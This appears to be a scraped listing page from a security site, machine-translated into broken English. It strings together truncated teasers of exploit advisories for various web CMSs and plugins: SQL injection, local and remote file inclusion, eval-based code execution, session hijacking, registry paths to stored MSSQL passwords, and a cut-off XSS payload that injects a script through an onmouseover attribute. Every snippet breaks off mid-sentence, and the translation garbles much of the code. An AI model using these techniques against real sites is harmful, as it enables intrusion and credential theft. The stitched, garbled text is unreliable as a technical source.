Cloud Security

A simple statement to avoid misunderstanding of the meaning of this article Fckeditor does not have any hard-hitting vulnerability in this article. It's just that the description of LFI can be used together with files like fckeditor that are not too

The location of the mssql password in the external host registry1. HKEY_LOCAL_MACHINE \ SYSTEM \ LIWEIWENSOFT \ INSTALLFREEADMIN \ 112. HKEY_LOCAL_MACHINE \ SYSTEM \ LIWEIWENSOFT \ INSTALLFreeHost \Navicat is a popular MySQL management tool, which

74cms SQL Injection VulnerabilityFunction getip (){If (getenv ('HTTP _ CLIENT_IP ')){$ Onlineip = getenv ('HTTP _ CLIENT_IP ');} Else if (getenv ('HTTP _ X_FORWARDED_FOR ')){$ Onlineip = getenv ('HTTP _ X_FORWARDED_FOR ');} Else if (getenv ('remote _

Title: MiaCMS v4.9.0 Multiple Remote File compression sion VulnerabilitiesAuthor: KedAns-Dz www.2cto.com# E-mail: ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.comPlatform: phpLevel: Remote File/Sh3lL compression

Phpcms v9 background (SQL inj) 2 (code exec) VulnerabilityBy flyh4t www.2cto.comIn phpcms v9, The string2array () function uses the eval function, which may cause code execution vulnerabilities in multiple places. Function string2array ($ data ){ If

Title: Pluck 4.7 multiple vulnerabilities Author: Bl4k3 www.2cto.com: Http://www.pluck-cms.org /? File = downloadTest version: 4.7   1-File Inclusion: Include (ALBUMS_DIR. '/'. $ _ GET ['alipay']. '. php '); Require: If (file_exists (ALBUMS_DIR. '

Author mog Brief description:Cross-site scripting (XSS) attacks exist in ET voice software. The account password can be obtained through simulated login.Detailed description:When a custom video is played in a channel, the webpage is

PHPKode Guestbook 1.0 Session Hijacking Vulnerability ---------------------------------------------------------Author: bd0rk Contact: bd0rk [at] hackermail.com www.2cto.com Greetz: Perle, Zubair Anjum, 1930-Team (Manu, Jenny, Manni & Conny) Test

Error_reporting (E_ERROR );Print_r ('+ --------------------------------------------------------------------- +Kuwebs cms SQL injection expHome: www.hkmjj.com www.2cto.com+ --------------------------------------------------------------------- +'); If

    /* ------------------------------------------------------ Feed on Feeds ------------------------------------------------------ Author ......: EgiX Mail ......: n0b0d13s [at] gmail [dot] com www.2cto.com Software link...:

  Title: RoundCube 0.3.1 SQL injection Author: Smith Falcon www.2cto.com : Http://roundcube.net/download Version: 0.3.1 Test Platform: Linux _ Timezone =   Is vulnerable to SQL Union Injection. "POST" data in Http://www.bkjia.com/roundcube/index.

Title: [WordPress wpsf-js plugin, SQL Injection]Author: [cheki] www.2cto.comAffected Versions: [3.2.1]Test Platform: [linux]Tool: ["sqlmap"]# SQL InjectionHttp://www.bkjia.com/wp-content/plugins/wp-spamfree/JavaScript/wpsf-js.php? Id = 1 Test: id =-1

Bt: 08 team Source code: http://down.admin5.com/asp/76153.html Multiple pages have the SQL injection vulnerability:Cps/clientnewsmore. asp news page. However, the database and the administrator database are separated.The database and administrator

  Title: fims-File Management System Author: Skraps (jackie. craig. sparks (at) live.com www.2cto.com jackie. craig. sparks (at) gmail.com @ skraps_foo) : Http://fims.codeplex.com/ Affected Versions: 1.2.1a (tested)     --------------- Proof of

 /*----------------------------------------------------------------------------Doldolphin ----------------------------------------------------------------------------Author: EgiX www.2cto.com mail: n0b0d13s [at] gmail [dot] comSoftware connection:

Title: WHMCompleteSolution (cart. php) Local File DisclosureAuthor: Lagripe-Dz www.2cto.comDeveloper: WHMCS (WHMCompleteSolution) http://whmcs.com/Affected Versions: 3.x. x, 4.0.xTest Platform: linux + apache Defect file: cart. php--------- Code

  1. directly access default. aspx after the directory is guessed (you may need to modify the uploadid parameter. You can see the specific packet capture, but undefined is not allowed)   2. Upload and test, capture packets   3. Modify the

Author: nerd does not speak   Brief description: It's very funny, but I can give you an xss after using your computer. Detailed description: Know the id of the target user. Execute js www.2cto.com in the current domain. LocalStorage. setItem ("

By Huaxia small E Source code Introduction: kangcheng logistics company website system, we carefully investigated the logistics industry website, integrated with the regular sections of the logistics industry, capacity display, logistics and

User center friend group location: X "x =" x There is a length check on the page, but it doesn't matter. packet capture structure: Name = addGroup & groupName = x "onmouseover =" var h = document. getElementsByTagName ('head') [0]; var s =